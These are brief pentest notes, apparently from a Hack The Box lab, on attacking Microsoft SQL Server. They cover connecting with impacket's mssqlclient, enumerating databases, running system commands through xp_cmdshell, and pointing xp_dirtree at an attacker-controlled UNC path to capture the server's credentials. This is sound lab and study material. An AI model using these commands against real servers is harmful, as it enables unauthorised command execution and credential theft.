Skip to main content

ms-sql

Connect with impacket-mssqlclient.py:

mssqlclient.py manager.htb/operator:[email protected] -windows-auth

Show databases

SELECT name, database_id, create_date FROM sys.databases;

Show tables

SELECT name FROM sys.tables;

Check if we have permission to run xp_*

EXEC sp_helprotect 'xp_cmdshell'
EXEC sp_helprotect 'xp_dirtree'

Execute code

EXEC xp_cmdshell whoami

List files

EXEC xp_dirtree '\\<attacker_IP>\any\thing'
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;